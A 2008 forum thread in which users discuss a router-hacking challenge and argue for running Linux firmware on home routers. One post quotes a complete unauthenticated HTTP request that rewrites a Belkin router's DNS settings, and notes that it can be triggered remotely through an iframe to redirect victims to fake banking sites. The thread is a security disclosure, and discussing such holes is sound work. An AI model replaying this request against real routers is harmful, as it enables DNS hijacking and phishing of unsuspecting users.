No. 1 reason to build your own router / reflash it with linux

Impotence · 07-02-2008, 05:54 PM

Router Hacking Challenge | GNUCITIZEN

Just having a quick glance over that page has shattered any confidence i had left in embedded devices (more specifically home routers).

Alot of the methods described can be done remotely (with scripts embedded into html pages on compromised servers / malicious sites etc) and would allow an attack to change DNS settings (to a DNS server they control).

If you control someones DNS results, then you control the content that there browser loads! (for example, send them the IP of another machine you control with a clone of there banks website hosted on it when they request what-ever-there-bank-is.com).

Addis · 07-02-2008, 05:23 PM

What about power usage compared to embedded devices?

Haven't read through all of that, how does changing the DNS settings work if you're not logged in to the router?

Impotence · 07-02-2008, 06:00 PM

Here's a good example

Quote:

Originally Posted by loftgaia

I now have managed to change router configuration options without even logging in. If I try to access the html pages of the router it will ask for a password,but not the script that handles the request itself.So we just need to replay the http packets that actually perform the action.

*No* authentication or spoofing is required.

HTTP headers:

POST /cgi-bin/setup_dns.exe
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://192.168.2.1/setup_dns.stm
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

HTTP body:
page=setup_dns&logout=&dns1_1=1&dns1_2=1&dns1_3=1& dns1_4=1&dns2_1=2&dns2_2=2&dns2_3=2&dns2_4=2

After sending this the primary DNS server IP-address will get changed to 1.1.1.1 and secondary DNS server to 2.2.2.2 . I have tried changing other options without password and it worked all the time,disable firewall,reset to factory defaults,etc.. The page will still ask for a password…too bad the script didn’t.This can obviously be triggered remotely for at least a couple of ways.

belkin.html:
Belkin Wireless G router F5D7230-4 Hole

we can load in an iframe for example:
page1.html

Tomorrow i will be bying a new router.

You can build very low power x86 computers, THIS mobo for example only draws 14W (and with a second network card or ADSL modem, some ram and a small SSD you have a low power router)

You can install Linux (openWRT etc) on quite a few home routers... I have openWRT running on a WRT54G (v2.2) acting as a wireless client with NAT to share the connection to the machines on the wired side (the other benefit of not using the default firmware, you cant do this with the default WRT54G firmware)

07-02-2008, 05:54 PM	#1 (permalink) Top
Impotence May the source be with u! Join Date: Dec 2004 Age: 19 Male Posts: 1,878 Times Helpful: 126 My Mood: Stressed Status: Offline My Computer	No. 1 reason to build your own router / reflash it with linux Router Hacking Challenge \| GNUCITIZEN Just having a quick glance over that page has shattered any confidence i had left in embedded devices (more specifically home routers). Alot of the methods described can be done remotely (with scripts embedded into html pages on compromised servers / malicious sites etc) and would allow an attack to change DNS settings (to a DNS server they control). If you control someones DNS results, then you control the content that there browser loads! (for example, send them the IP of another machine you control with a clone of there banks website hosted on it when they request what-ever-there-bank-is.com). __________________ Dear intel,Already Made My Decision Never trust a computer you can't repair yourself. Windows Vista - Viruses Intruders Spyware Trojans Adware Why Linux is Better!\|Pastafairianism\|Say no to National ID\|Firefox Extensions Guide scientology has been getting alot of attention recently When the rich wage war, it is the poor who die. Where are the WMD's that our governments used to justify the war?

07-02-2008, 05:23 PM	#2 (permalink) Top
Addis The King Join Date: Jan 2004 Age: 18 Male Posts: 5,255 Times Helpful: 403 My Mood: Drunk Status: Offline My Computer	What about power usage compared to embedded devices? Haven't read through all of that, how does changing the DNS settings work if you're not logged in to the router? __________________ Never trust a program you don't have the source code for. My website \| Powerful Desktop Linux \| Linux for human beings \| Linux for power users \| Linux for ricers

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Build flash websites in linux	zeus	General Software	3	22-07-2007 02:54 PM
Reason 3.5	zRoCkIsAdDiCtInG	User Reviews	13	01-04-2007 01:12 AM
1 reason not to buy Vista	Swansen	General Software	11	20-09-2006 08:45 PM
Any Reason for AV?	Someone28624	Linux and Other OSes	8	18-01-2006 08:03 PM
Reason #248-24 why collected series are good	Big B	Anime and Manga	4	17-08-2004 12:10 AM

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)